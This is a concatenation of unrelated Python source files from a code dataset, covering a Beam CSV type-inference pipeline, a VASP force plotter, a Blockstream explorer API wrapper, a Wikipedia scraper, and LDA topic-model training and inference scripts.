def data_type_reference(argv=None, save_main_session=True):
"""Main entry point; defines and runs the wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
dest='input',
required=True,
help='Input file to process.')
parser.add_argument(
'--output',
dest='output',
required=True,
help='Output file to write results to.')
parser.add_argument(
'--temp',
dest='temp',
required=True,
help='Temp file')
known_args, pipeline_args = parser.parse_known_args(argv)
print(known_args.input,known_args.output)
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
p = beam.Pipeline(options=pipeline_options)
raw_header = pd.read_csv(known_args.input,header=None,nrows=1)
print(raw_header)
header_array = []
for i in range(raw_header.shape[1]):
header_array.append(raw_header.iloc[0,i])
csv_lines = (
p | beam.io.ReadFromText(known_args.input,skip_header_lines=1) |
beam.ParDo(Split(),header_array)
)
def distinct_count_extract(l):
(tuple_list, number) = l
return (tuple_list[0], (1,tuple_list[2]))
def count_values(value_ones):
(feature,arr) = value_ones
ones = [i[0] for i in arr]
type = [i[1] for i in arr]
return (feature, sum(ones),max(type, key = type.count))
def feature_reference(value_counts):
(index,counts,type) = value_counts
if(counts == 2):
return (index,"Boolean")
elif(counts > 2 and counts <= 15):
return (index,"Categorical")
elif(type == "Numeric"):
return (index,"Numeric")
return (index,"String")
type_reference = (
csv_lines | beam.ParDo(Collect()) |
"PerElement Count" >> beam.combiners.Count.PerElement() |
"Distinct Count Preprocess" >> beam.Map(distinct_count_extract) |
"Distinct Count Group" >> beam.GroupByKey() |
"Distinct Count" >> beam.Map(count_values) |
"Map Result" >> beam.Map(feature_reference)
)
output = (
type_reference | beam.io.WriteToText(known_args.output)
)
result = p.run()
result.wait_until_finish()
return known_args
``` |
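A sketch of how this pipeline would typically be launched locally; the file paths and the default DirectRunner are assumptions, not values taken from the repository.
```python
# hypothetical local run; extra runner flags would be passed through to PipelineOptions
data_type_reference([
    '--input=data/input.csv',        # placeholder path
    '--output=out/feature_types',    # placeholder path
    '--temp=out/tmp',                # placeholder path
])
```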
{
"source": "843436348989172/benwmcdowell",
"score": 2
} |
#### File: 843436348989172/benwmcdowell/plot_forces.py
```python
import matplotlib.pyplot as plt
import sys
import getopt
from numpy import array,dot,percentile,average
from numpy.linalg import norm
def main(outcar,poscar,**args):
if 'quiet' in args and args['quiet']:
quiet=True
else:
quiet=False
try:
seldyn = parse_poscar(poscar)[4]
except (IndexError, FileNotFoundError):
seldyn='none'
forces,time,tol=parse_forces(outcar,seldyn=seldyn)
minima=[[],[],[],[]]
averages=[[],[],[],[]]
maxima=[[],[],[],[]]
upperq=[[],[],[],[]]
lowerq=[[],[],[],[]]
for i in range(4):
if len(forces[i])>0:
for j in forces[i]:
if len(j)>0:
minima[i].append(min(j))
averages[i].append(average(j))
maxima[i].append(max(j))
upperq[i].append(percentile(j,75))
lowerq[i].append(percentile(j,25))
if not quiet:
data_labels=['minimum','lower quartile','average','upper quartile','maximum']
data_sets=[minima,lowerq,averages,upperq,maxima]
else:
data_labels=['minimum','average','maximum']
data_sets=[minima,averages,maxima]
#each component and the total force are plotted on their own subplot, along with the convergence criteria set by EDIFFG
fig,axs=plt.subplots(4,1,sharex=True,figsize=(14,8))
for i,j in zip(range(4),['_x','_y','_z','_{total}']):
for k,l in zip(data_labels,data_sets):
try:
axs[i].scatter(time,l[i],label=k)
max_range=max(maxima[i])-min(minima[i])
axs[i].set_ylim(bottom=min(minima[i])-0.05*max_range,top=max(maxima[i])+0.05*max_range)
except ValueError:
pass
if len(time)==1:
axs[i].plot([-1,1],[tol,tol],linestyle='dashed',label='convergence')
else:
axs[i].plot([time[0],time[-1]],[tol,tol],linestyle='dashed',label='convergence')
axs[i].set(ylabel='$F{}$'.format(j)+r' / eV $\AA^{-1}$')
if time[-1]-time[0]>0.0:
axs[-1].set(xlabel='optimization time / fs')
else:
axs[-1].set(xlabel='optimization steps')
handles, labels = axs[2].get_legend_handles_labels()
fig.legend(handles, labels, bbox_to_anchor=(1.01,0.5), loc='right')
plt.show()
def parse_forces(ifile,**args):
if 'seldyn' in args:
seldyn=args['seldyn']
else:
seldyn='none'
time=[]
forces=[[],[],[],[]]
try:
with open(ifile,'r') as file:
searching=True
while searching:
line=file.readline()
if not line:
break
if 'EDIFFG' in line:
line=line.split()
tol=abs(float(line[line.index('EDIFFG')+2]))
if 'POTIM' in line:
line=line.split()
potim=float(line[line.index('POTIM')+2])
if potim==0.0:
potim=-1.0
if 'NIONS' in line:
line=line.split()
atomnum=int(line[line.index('NIONS')+2])
if seldyn=='none':
seldyn=['TTT' for i in range(atomnum)]
elif 'TOTAL-FORCE' in line:
line=file.readline()
temp_forces=[[],[],[],[]]
for i in range(atomnum):
line=file.readline().split()
tempvar=[]
for j in range(3,6):
if seldyn[i][j-3]=='T':
temp_forces[j-3].append(abs(float(line[j])))
tempvar.append(abs(float(line[j])))
if len(tempvar)>0:
temp_forces[3].append(norm(array(tempvar)))
for i in range(4):
forces[i].append(temp_forces[i])
if len(time)==0:
time.append(0.0)
else:
time.append(time[-1]+abs(potim))
except:
print('error reading OUTCAR')
sys.exit(1)
if len(time)==0:
print('zero ionic steps read from OUTCAR')
sys.exit()
return forces,time,tol
def parse_poscar(ifile):
with open(ifile, 'r') as file:
lines=file.readlines()
sf=float(lines[1])
latticevectors=[float(lines[i].split()[j])*sf for i in range(2,5) for j in range(3)]
latticevectors=array(latticevectors).reshape(3,3)
atomtypes=lines[5].split()
atomnums=[int(i) for i in lines[6].split()]
if lines[7].split()[0] == 'Direct':
start=8
else:
start=9
seldyn=[''.join(lines[i].split()[-3:]) for i in range(start,sum(atomnums)+start)]
coord=array([[float(lines[i].split()[j]) for j in range(3)] for i in range(start,sum(atomnums)+start)])
for i in range(sum(atomnums)):
coord[i]=dot(latticevectors,coord[i])
#latticevectors formatted as a 3x3 array
#coord holds the atomic coordinates with shape ()
try:
return latticevectors, coord, atomtypes, atomnums, seldyn
except NameError:
return latticevectors, coord, atomtypes, atomnums
if __name__=='__main__':
outcar='./OUTCAR'
poscar='./POSCAR'
quiet=False
try:
opts,args=getopt.getopt(sys.argv[1:],'ho:p:q',['help','outcar=','poscar=','quiet'])
except getopt.GetoptError:
print('error in command line syntax')
sys.exit(2)
for i,j in opts:
if i in ['-h','--help']:
print('''
input options:
-o, --outcar specify a path to the OUTCAR file other than ./OUTCAR
-p, --poscar specify a path to the POSCAR file other than ./POSCAR
-q, --quiet suppresses plotting of quartiles for a less crowded output
help options:
-h, --help display this help message
''')
sys.exit()
if i in ['-o','--outcar']:
outcar=j
if i in ['-p','--poscar']:
poscar=j
if i in ['-q','--quiet']:
quiet=True
main(outcar,poscar,quiet=quiet)
``` |
{
"source": "84adam/blockstream",
"score": 3
} |
#### File: blockstream/blockstream/blockexplorer.py
```python
from . import util
def get_transaction(tx_id):
"""
Request information about a transaction by ID
:param str tx_id: transaction ID
:return: an instance of :class:`Transaction` class
"""
resource = f'tx/{tx_id}'
tx_data = util.call_api(resource)
return Transaction(tx_data)
def get_transaction_status(tx_id):
"""
Request the transaction confirmation status
:param str tx_id: transaction ID
:return: an instance of :class:`TransactionStatus` class
"""
resource = f'tx/{tx_id}/status'
response = util.call_api(resource)
return TransactionStatus(response)
def get_transaction_hex(tx_id):
"""
Request the raw transaction in hex
:param str tx_id: transaction ID
:return: the raw transaction as a hex string
"""
resource = f'tx/{tx_id}/hex'
response = util.call_api(resource)
return response  # raw hex string from the API, returned as-is
def get_transaction_merkle_proof(tx_id):
"""
Request the merkle inclusion proof of a transaction
:param str tx_id: transaction ID
:return: an instance of :class:`TransactionMerkle` class
"""
resource = f'tx/{tx_id}/merkle-proof'
response = util.call_api(resource)
return TransactionMerkleProof(response)
def get_transaction_output_status(tx_id, vout):
"""
Request the spending status of a transaction output
:param str tx_id: transaction ID
:param str vout: transaction output
:return: an instance of :class:`TransactionOutput` class
"""
resource = f'tx/{tx_id}/outspend/{vout}'
response = util.call_api(resource)
return TransactionOutput(response)
def get_all_transaction_outputs_statuses(tx_id):
"""
Request the spending status of all transaction outputs
:param str tx_id: transaction ID
:return list: a list of :class:`TransactionOutput` objects
"""
resource = f'tx/{tx_id}/outspends'
response = util.call_api(resource)
outspends = []
for output in response:
outspends.append(TransactionOutput(output))
return outspends
def post_transaction():
"""
Broadcast a raw transaction to the network (not yet implemented)
"""
pass
def get_address(address):
"""
Request address information
:param str address: a bitcoin address/scripthash
:return: an instance of :class:`Address` class
"""
resource = f'address/{address}'
response = util.call_api(resource)
return Address(response)
def get_address_transactions(address):
"""
Request all transactions for an address, newest first
:param str address: a bitcoin address/scripthash
:return list: a list of :class:`Transaction` objects
"""
resource = f'address/{address}/txs'
response = util.call_api(resource)
transactions = []
for tx in response:
transactions.append(Transaction(tx))
return transactions
def get_confirmed_transaction_history(address, ls_tx_id=''):
"""
Request confirmed transaction history for an address, newest first
25 per page
:param str address: a bitcoin address
:param str ls_tx_id: last transaction ID
:return list: a list of :class:`Transaction` objects
"""
resource = f'address/{address}/txs/chain/{ls_tx_id}'
response = util.call_api(resource)
confirmed_transactions = []
for tx in response:
confirmed_transactions.append(Transaction(tx))
return confirmed_transactions
def get_address_mempool(address):
"""
Request unconfirmed transaction history of an address, newest first
up to 50 transactions no paging
:param str address: a bitcoin address
:return list: a list of :class:`Transaction` objects
"""
resource = f'address/{address}/txs/mempool'
response = util.call_api(resource)
mempool_transactions = []
for tx in response:
mempool_transactions.append(Transaction(tx))
return mempool_transactions
def get_address_utxo(address):
"""
Request the list of unspent transaction outputs associated with
an address
:param str address: a bitcoin address
:return list: a list of :class:`UTXO` objects
"""
resource = f'address/{address}/utxo'
response = util.call_api(resource)
utxo_list = []
for utxo in response:
utxo_list.append(UTXO(utxo))
return utxo_list
def get_block_by_hash(block_hash):
"""
Request a given block by hash
:param str block_hash: a bitcoin block hash
:return: an instance of :class:`Block` class
"""
resource = f'block/{block_hash}'
response = util.call_api(resource)
return Block(response)
def get_block_by_height(height):
"""
Request a given block by height
:param str height: a bitcoin block height
:return: an instance of :class:`Block` class
"""
block_hash = get_block_hash_from_height(height)
resource = f'block/{block_hash}'
response = util.call_api(resource)
return Block(response)
def get_block_hash_from_height(height):
"""
Request a block hash by specifying the height
:param str height: a bitcoin block height
:return: a bitcoin block hash
"""
resource = f'block-height/{height}'
return util.call_api(resource)
def get_block_status(block_hash):
"""
Request the block status
:param str block_hash: a bitcoin block hash
:return: an instance of :class:`BlockStatus` class
"""
resource = f'block/{block_hash}/status'
response = util.call_api(resource)
return BlockStatus(response)
def get_block_transactions(block_hash, start_index='0'):
"""
Request a list of transactions in a block (up to 25)
:param str block_hash: a bitcoin block hash
:param str start_index: index of transaction list to start from
"""
resource = f'block/{block_hash}/txs/{start_index}'
response = util.call_api(resource)
transactions = []
for tx in response:
transactions.append(Transaction(tx))
return transactions
def get_transaction_ids(block_hash):
"""
Request a list of all transaction IDs in a block
:param str block_hash: a bitcoin block hash
:return: a list of transaction IDs in the block
"""
resource = f'block/{block_hash}/txids'
response = util.call_api(resource)
return response
def get_blocks(start_height=''):
"""
Request the 10 newest blocks starting at tip (most recent)
or at start_height (optional)
:param str start_height: block height
:return: a list of :class:`Block` objects
"""
resource = f'blocks/{start_height}'
response = util.call_api(resource)
blocks = []
for block in response:
blocks.append(Block(block))
return blocks
def get_last_block_height():
"""
Request the height of the last block
:return: height of the most recent block in the chain
"""
resource = 'blocks/tip/height'
return util.call_api(resource)
def get_last_block_hash():
"""
Request the hash of the last block
"""
resource = 'blocks/tip/hash'
return util.call_api(resource)
def get_mempool():
"""
Request mempool backlog statistics
"""
response = util.call_api('mempool')
return Mempool(response)
def get_mempool_transaction_ids():
"""
Request the full list of transactions IDs currently in the mempool,
as an array
:return list: a list of transaction IDs
"""
resource = 'mempool/txids'
return util.call_api(resource)
def get_mempool_recent_transactions():
"""
Request a list of the last 10 transactions to enter the mempool
:return list: a list of transaction IDs
"""
resource = 'mempool/recent'
response = util.call_api(resource)
transactions = []
for tx in response:
transactions.append(MempoolRecent(tx))
return transactions
def get_fee_estimates():
"""
Request an object where the key is the confirmation target (in number
of blocks) and the value is estimated fee rate (in sat/vB)
:return: an instance of :class:`FeeEstimate` class
"""
response = util.call_api('fee-estimates')
return FeeEstimates(response)
class BlockStatus:
"""Bitcoin block status utility."""
def __init__(self, status):
self.in_best_chain = status['in_best_chain']
self.height = status['height']
self.next_best = status['next_best']
class Block:
"""Bitcoin block utility class"""
def __init__(self, block):
self.id = block['id']
self.height = block['height']
self.version = block['version']
self.timestamp = block['timestamp']
self.tx_count = block['tx_count']
self.size = block['size']
self.weight = block['weight']
self.merkle_root = block['merkle_root']
self.previous_block_hash = block['previousblockhash']
self.nonce = block['nonce']
self.bits = block['bits']
class Address:
"""Bitcoin Address utility class."""
def __init__(self, address):
self.address = address['address'] # str
self.chain_stats = address['chain_stats'] # dict
self.mempool_stats = address['mempool_stats'] # dict
class UTXO:
"""Bitcoin UTXO utility class."""
def __init__(self, utxo):
self.tx_id = utxo['txid']
self.vout = utxo['vout']
self.status = TransactionStatus(utxo['status'])
self.value = utxo['value']
class TransactionStatus:
"""Transaction status utility."""
def __init__(self, status):
self.confirmed = status['confirmed']
self.block_height = status['block_height']
self.block_hash = status['block_hash']
self.block_time = status['block_time']
class TransactionMerkleProof:
"""Tx Merkle proof utility."""
def __init__(self, merkle):
self.block_height = merkle['block_height']
self.merkle = merkle['merkle']
self.pos = merkle['pos']
class TransactionOutput:
"""Tx Output utility."""
def __init__(self, output):
self.spend = output['spent']
self.tx_id = output['txid']
self.vin = output['vin']
self.status = TransactionStatus(output['status'])
class Transaction:
"""Bitcoin Transaction utility class."""
def __init__(self, transaction):
self.id = transaction['txid']
self.version = transaction['version']
self.locktime = transaction['locktime']
self.vin = transaction['vin']
self.vout = transaction['vout']
self.size = transaction['size']
self.weight = transaction['weight']
self.fee = transaction['fee']
self.status = TransactionStatus(transaction['status'])
class Mempool:
"""Bitcoin Mempool utility class."""
def __init__(self, mempool):
self.count = mempool['count']
self.vsize = mempool['vsize']
self.total_fee = mempool['total_fee']
self.fee_histogram = mempool['fee_histogram']
class MempoolRecent:
"""Recent TXs in mempool utility."""
def __init__(self, info):
self.tx_id = info['txid']
self.fee = info['fee']
self.vsize = info['vsize']
self.value = info['value']
class FeeEstimates:
"""Fee Estimates utility class."""
def __init__(self, data):
self.two_blocks = data['2']
self.three_blocks = data['3']
self.four_blocks = data['4']
self.six_blocks = data['6']
self.ten_blocks = data['10']
self.twenty_blocks = data['20']
self.onefourfour_blocks = data['144']
self.fivezerofour_blocks = data['504']
self.tenzeroeight_blocks = data['1008']
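# --- Illustrative usage sketch (appended here; not part of the original module) ---
# Assumes network access to the Esplora-style API behind util.call_api; the txid
# below is a placeholder, not a real transaction.
# tip_height = get_last_block_height()
# recent_blocks = get_blocks()                 # ten newest Block objects
# fees = get_fee_estimates()                   # fees.two_blocks -> sat/vB for a ~2-block target
# tx = get_transaction('<txid placeholder>')   # Transaction; inspect tx.status.confirmed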
``` |
{
"source": "84adam/python3-nlp",
"score": 3
} |
#### File: 84adam/python3-nlp/get_wiki.py
```python
import bs4
import requests
from urllib.request import urlopen
from itertools import chain
from html.parser import HTMLParser
from requests import get
import os
import time
from pathlib import Path
import pandas as pd
from keras.preprocessing.text import text_to_word_sequence
# WIKI TEXT BODY SCRAPING FUNCTION
def wiki_text(url):
response = requests.get(url)
para_text = []
if response is not None:
html = bs4.BeautifulSoup(response.text, 'html.parser')
title = html.select("#firstHeading")[0].text
paragraphs = html.select("p")
for para in paragraphs:
para_text.append(para.text.strip())
return ' '.join([x for x in para_text])
# FUNCTIONS/CLASS TO SCRAPE LINKS FROM A WEBSITE
class LinkParser(HTMLParser):
def reset(self):
HTMLParser.reset(self)
self.links = iter([])
def handle_starttag(self, tag, attrs):
if tag == 'a':
for name, value in attrs:
if name == 'href':
self.links = chain(self.links, [value])
def gen_links(f, parser):
encoding = f.headers.get_content_charset() or 'UTF-8'
for line in f:
parser.feed(line.decode(encoding))
yield from parser.links
# WIKIPEDIA SPECIFIC LINK-SCRAPING FUNCTION
def wiki_gen_links(f, parser):
links_list = []
wiki_list = []
links = gen_links(f, parser)
for i in links:
links_list.append(i)
for i in links_list:
if i[0:6] == "/wiki/":
if ":" not in i:
if "#" not in i:
wiki_list.append(i[6:])
set_links_list = [x for x in set(list(wiki_list))]
return set_links_list
# BASE URLs FROM WHICH TO SCRAPE ADDITIONAL ARTICLES
base_urls = ['https://en.wikipedia.org/wiki/Graphic_design', 'https://en.wikipedia.org/wiki/Marketing',
'https://en.wikipedia.org/wiki/Communication', 'https://en.wikipedia.org/wiki/Sales',
'https://en.wikipedia.org/wiki/Finance', 'https://en.wikipedia.org/wiki/Accounting',
'https://en.wikipedia.org/wiki/Law', 'https://en.wikipedia.org/wiki/Business',
'https://en.wikipedia.org/wiki/Business_administration', 'https://en.wikipedia.org/wiki/Value-added_reseller',
'https://en.wikipedia.org/wiki/Customer_service', 'https://en.wikipedia.org/wiki/User_experience',
'https://en.wikipedia.org/wiki/Energy', 'https://en.wikipedia.org/wiki/Transport',
'https://en.wikipedia.org/wiki/Industry', 'https://en.wikipedia.org/wiki/Manufacturing',
'https://en.wikipedia.org/wiki/Electronics', 'https://en.wikipedia.org/wiki/Software',
'https://en.wikipedia.org/wiki/Engineering', 'https://en.wikipedia.org/wiki/Technology',
'https://en.wikipedia.org/wiki/Mathematics', 'https://en.wikipedia.org/wiki/System',
'https://en.wikipedia.org/wiki/Knowledge', 'https://en.wikipedia.org/wiki/Logic',
'https://en.wikipedia.org/wiki/Engineer', 'https://en.wikipedia.org/wiki/Microcontroller',
'https://en.wikipedia.org/wiki/Industrial_control_system', 'https://en.wikipedia.org/wiki/PID_controller',
'https://en.wikipedia.org/wiki/Control_loop', 'https://en.wikipedia.org/wiki/Programmable_logic_controller',
'https://en.wikipedia.org/wiki/Assembly_line', 'https://en.wikipedia.org/wiki/Robotics',
'https://en.wikipedia.org/wiki/Petroleum_engineering', 'https://en.wikipedia.org/wiki/Industrial_engineering',
'https://en.wikipedia.org/wiki/Open-source_software', 'https://en.wikipedia.org/wiki/Electrical_engineering',
'https://en.wikipedia.org/wiki/Computer_engineering', 'https://en.wikipedia.org/wiki/Computer_science',
'https://en.wikipedia.org/wiki/Mechanical_engineering', 'https://en.wikipedia.org/wiki/Microsoft_Windows',
'https://en.wikipedia.org/wiki/Operating_system', 'https://en.wikipedia.org/wiki/Computer_program',
'https://en.wikipedia.org/wiki/Human%E2%80%93computer_interaction', 'https://en.wikipedia.org/wiki/History',
'https://en.wikipedia.org/wiki/Art', 'https://en.wikipedia.org/wiki/Music', 'https://en.wikipedia.org/wiki/Food',
'https://en.wikipedia.org/wiki/Education', 'https://en.wikipedia.org/wiki/Health',
'https://en.wikipedia.org/wiki/Medicine', 'https://en.wikipedia.org/wiki/Politics',
'https://en.wikipedia.org/wiki/Management', 'https://en.wikipedia.org/wiki/Chemistry',
'https://en.wikipedia.org/wiki/Biology', 'https://en.wikipedia.org/wiki/Physics',
'https://en.wikipedia.org/wiki/Geology', 'https://en.wikipedia.org/wiki/Astronomy',
'https://en.wikipedia.org/wiki/Anthropology', 'https://en.wikipedia.org/wiki/Sociology',
'https://en.wikipedia.org/wiki/Psychology', 'https://en.wikipedia.org/wiki/Science',
'https://en.wikipedia.org/wiki/Formal_science', 'https://en.wikipedia.org/wiki/Natural_science',
'https://en.wikipedia.org/wiki/Social_science', 'https://en.wikipedia.org/wiki/Game_theory',
'https://en.wikipedia.org/wiki/Network_theory', 'https://en.wikipedia.org/wiki/Artificial_neural_network',
'https://en.wikipedia.org/wiki/Broadcast_network', 'https://en.wikipedia.org/wiki/Electrical_network',
'https://en.wikipedia.org/wiki/Social_networking_service',
'https://en.wikipedia.org/wiki/Telecommunications_network', 'https://en.wikipedia.org/wiki/Computer_network',
'https://en.wikipedia.org/wiki/Transport_network', 'https://en.wikipedia.org/wiki/Money',
'https://en.wikipedia.org/wiki/Bitcoin', 'https://en.wikipedia.org/wiki/Gold',
'https://en.wikipedia.org/wiki/Silver', 'https://en.wikipedia.org/wiki/Fiat_money',
'https://en.wikipedia.org/wiki/Bank', 'https://en.wikipedia.org/wiki/Economics',
'https://en.wikipedia.org/wiki/Production_(economics)', 'https://en.wikipedia.org/wiki/Service_(economics)',
'https://en.wikipedia.org/wiki/Utility', 'https://en.wikipedia.org/wiki/The_arts',
'https://en.wikipedia.org/wiki/Philosophy', 'https://en.wikipedia.org/wiki/Theatre',
'https://en.wikipedia.org/wiki/Film', 'https://en.wikipedia.org/wiki/Dance',
'https://en.wikipedia.org/wiki/Fine_art', 'https://en.wikipedia.org/wiki/Applied_arts',
'https://en.wikipedia.org/wiki/Linguistics', 'https://en.wikipedia.org/wiki/Slang',
'https://en.wikipedia.org/wiki/Sarcasm', 'https://en.wikipedia.org/wiki/Culture',
'https://en.wikipedia.org/wiki/Security', 'https://en.wikipedia.org/wiki/Media',
'https://en.wikipedia.org/wiki/List_of_countries_by_spoken_languages', 'https://en.wikipedia.org/wiki/Humanities',
'https://en.wikipedia.org/wiki/Sport', 'https://en.wikipedia.org/wiki/Relationship',
'https://en.wikipedia.org/wiki/Religion', 'https://en.wikipedia.org/wiki/Faith',
'https://en.wikipedia.org/wiki/Spirituality', 'https://en.wikipedia.org/wiki/Literature',
'https://en.wikipedia.org/wiki/Fiction', 'https://en.wikipedia.org/wiki/Nonfiction',
'https://en.wikipedia.org/wiki/Classics', 'https://en.wikipedia.org/wiki/Western_world',
'https://en.wikipedia.org/wiki/Eastern_world', 'https://en.wikipedia.org/wiki/Renaissance',
'https://en.wikipedia.org/wiki/History_by_period', 'https://en.wikipedia.org/wiki/List_of_time_periods',
'https://en.wikipedia.org/wiki/Category:History_of_science_and_technology_by_country']
# COLLECTION OF LINKS FROM WIKIPEDIA ARTICLES
url_list = []
wiki_base = "https://en.wikipedia.org/wiki/"
for i in base_urls:
if i not in url_list:
url_list.append(i)
parser = LinkParser()
f = urlopen(i)
wlinks = wiki_gen_links(f, parser)
for l in wlinks:
if l not in url_list:
url_list.append(wiki_base + l)
# GATHER BODY TEXT FROM ALL ARTICLES IN url_list
# Pause briefly between downloads (0.5 s here) to avoid hammering Wikipedia
def wiki_all_text(url_list):
print("Downloading {} documents...\n".format(len(url_list)))
all_docs = []
for i in url_list:
print("Fetching text from: {}".format(i))
all_docs.append(wiki_text(i))
time.sleep(0.5)
print("Download complete.\n")
return all_docs
# RUN IT
idx = url_list
doc = wiki_all_text(url_list)
# CREATE DATAFRAME AND CSV FILE FOR EXPORT
wiki_df = pd.DataFrame({'index':[x for x in idx], 'doc':[' '.join(text_to_word_sequence(str(x))) for x in doc]})
wiki_df.to_csv('wiki_df.csv')
wiki_df.head(30)
```
#### File: 84adam/python3-nlp/infer_topics.py
```python
import sys
import os
import nltk
import spacy
import gensim
import sklearn
import keras
import pandas as pd
import numpy as np
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
nltk.download('wordnet')
nltk.download('stopwords')
from gensim.parsing.preprocessing import STOPWORDS
from gensim.utils import simple_preprocess
from gensim import corpora, models
from keras.preprocessing.text import text_to_word_sequence
from sklearn.feature_extraction import stop_words
# define stopwords
def add_words(filename):
with open(filename) as f:
additional_words = f.readlines()
additional_words = [x.strip() for x in additional_words]
return additional_words
def remove_words(filename):
with open(filename) as f:
unstop = f.readlines()
unstop = [x.strip() for x in unstop]
return unstop
def define_stopwords():
"""
default: combine SKLEARN, NLTK, and SPACY stopwords -> 'sns_set'
alternative: set custom 'additional_words' and 'unstop' words (to ignore)
function returns a list: 'stopwords'
"""
# corpus-specific stop words [OPTIONAL]
# add 'stop.txt' to local directory, pass as argument 2
additional_words = ['nan']
# don't remove these words which may be important in our context [OPTIONAL]
# add 'unstop.txt' to local directory, pass as argument 3
unstop = []
gen_stop = gensim.parsing.preprocessing.STOPWORDS
nlp = spacy.load('en')
spacy_stop = nlp.Defaults.stop_words # .add("my_new_stopword")
sk_stop = stop_words.ENGLISH_STOP_WORDS
nltk_stop = stopwords.words('english')
custom_stop = additional_words
sns_stop = []
all_stop = []
# combine sklearn, nltk, and spacy stop word lists: sns_stop
# also add these to all_stop
for i in gen_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
for i in spacy_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
for i in sk_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
for i in nltk_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
# add corpus specific stop words to all_stop
for i in custom_stop:
if i not in unstop:
if i not in all_stop:
all_stop.append(i)
sns_set = list(set(sns_stop))
all_set = list(set(all_stop))
if len(custom_stop) == 0 and len(unstop) == 0:
# print(f'sns_set stopwords = {len(sns_set)} words: \nExamples: \n{[x for x in sns_set[0:10]]}\n{[x for x in sns_set[10:20]]}')
my_stopwords = sns_set
else:
# print(f'all_set (custom) stopwords = {len(all_set)} words: \nExamples: \n{[x for x in all_set[0:10]]}\n{[x for x in all_set[10:20]]}')
my_stopwords = all_set
return my_stopwords
# preprocessing functions
stemmer = PorterStemmer()
def lemmatize_stemming(text):
return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
def preprocess(text):
result = []
for token in gensim.utils.simple_preprocess(text):
if token not in my_stopwords and len(token) > 2:
result.append(lemmatize_stemming(token))
return result
def word_split(doc):
words = []
for word in doc.split(' '):
words.append(word)
return words
# Infer Topic Probability Distribution of New Document
def infer_topic(new_doc):
print("(1) Performing preprocessing...")
pre_new = preprocess(new_doc) # remove stop-words, lemmatize, and stem
print(f'{pre_new[0:5]} ...')
print("(2) Building term-frequency dictionary...")
dict_new = dictionary.doc2bow(pre_new) # build term-frequency dictionary
first_five = [f'{dict_new[i][0]}: \"{dictionary[dict_new[i][0]]}\"*{dict_new[i][1]}' for i in range(len(dict_new[0:5]))]
print(f'{[x for x in first_five]}')
print("(3) Inferring topic distribution...")
vector = model[dict_new] # get topic probability distribution for new_doc
print("\nTopic Probability Distribution:")
print(vector)
if __name__ == '__main__':
filepath = str(sys.argv[1]) # path to saved tf-lda* files, stop.txt, unstop.txt
new_doc = str(sys.argv[2])
filename_model = filepath + '/' + 'tf-lda.model'
filename_dict = filepath + '/' + 'tf-lda.dict'
filename_stop = filepath + '/' + 'stop.txt'
filename_unstop = filepath + '/' + 'unstop.txt'
print(f'\nLoading model files and stopwords...')
my_stopwords = define_stopwords()
new_words = add_words(filename_stop)
new_unstop = remove_words(filename_unstop)
for i in new_words:
my_stopwords.append(i)
my_stopwords = [w for w in my_stopwords if w not in new_unstop]
my_stopwords = list(set(my_stopwords))
print(f'Loaded {len(my_stopwords)} stopwords.\n')
model = gensim.models.LdaModel.load(filename_model)
dictionary = corpora.Dictionary.load(filename_dict)
# print all topics
for i in range(0, model.num_topics):
print(f'Topic #{i}: {model.print_topic(i)}')
print(f'\nPerforming inference on new document...')
infer_topic(new_doc)
```
#### File: 84adam/python3-nlp/train_model.py
```python
import os
import gensim
import pandas as pd
import numpy as np
import sys
import subprocess
import shlex
from gensim import corpora, models
# build topic model
arguments = sys.argv[1:]
if len(arguments) < 7:
print("\nERROR: Missing Required Arguments: ")
print("(1) dict_no_below; (2) dict_no_above; (3) dict_keep_n;")
print("(4) num_topics; (5) num_passes; (6) workers")
print("(7) processed_docs pkl file")
print("\nSuggested Defaults: ")
print("(1) 30; (2) 0.70; (3) 100000;")
print("(4) 20; (5) 2; (6) 2 [or: `nproc` - 1].")
print("(y) processed_docs.pkl.\n")
sys.exit(2)
dict_no_below = int(sys.argv[1])
dict_no_above = float(sys.argv[2])
dict_keep_n = int(sys.argv[3])
num_topics = int(sys.argv[4])
num_passes = int(sys.argv[5])
workers = int(sys.argv[6])
processed_docs = pd.read_pickle(sys.argv[7])
# load dictionary
print("Loading data...")
dictionary = gensim.corpora.Dictionary(processed_docs)
print(f'Unfiltered dictionary contains {len(list(dictionary.values()))} features.')
# filter dictionary
print("Filtering...")
dictionary.filter_extremes(no_below=dict_no_below, no_above=dict_no_above, keep_n=dict_keep_n)
print(f'Filtered dictionary contains {len(list(dictionary.values()))} features.')
bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs]
tfidf = models.TfidfModel(bow_corpus)
corpus_tfidf = tfidf[bow_corpus]
# set passes and range of topic numbers to try
range_num_topics = [num_topics]
# lists to index each type of model generated below
tf_set = [[] for x in range(len(range_num_topics))]
count = 0
# build one model of each type for every `num_topics` in `range_num_topics`
# append these to `tf_set`
print("\nHyperparameters selected: ")
print(f'dict_no_below = {dict_no_below}')
print(f'dict_no_above = {dict_no_above}')
print(f'dict_keep_n = {dict_keep_n}')
print(f'num_topics = {num_topics}')
print(f'num_passes = {num_passes}')
print(f'workers = {workers}')
print("\nInitializing model training...\n")
for i in range_num_topics:
num_topics = i
tf_set[count] = gensim.models.LdaMulticore(corpus_tfidf, num_topics=num_topics, id2word=dictionary, passes=num_passes, workers=workers)
count += 1
print(f'\nGensim LDA & TF-IDF model trained with {num_topics} topics: \n')
for x, y in zip(range_num_topics, tf_set):
print(f'\nTF-IDF model with {x} topics: \n')
for idx, topic in y.print_topics():
print(f'Topic #{idx}: {topic}')
# save trained model
filename_model = 'tf-lda.model'
filename_dict = 'tf-lda.dict'
tf_set[0].save(filename_model)
dictionary.save(filename_dict)
print("\nModel saved to current directory.")
print("Backing up model(s)...")
def subprocess_cmd(command):
process = subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)
proc_stdout = process.communicate()[0].strip()
print(proc_stdout)
subprocess_cmd('bash tar_model.sh')
print("Model(s) backed up to ./models/saved-model")
print("DONE.\n")
``` |
{
"source": "84KaliPleXon3/andriller",
"score": 2
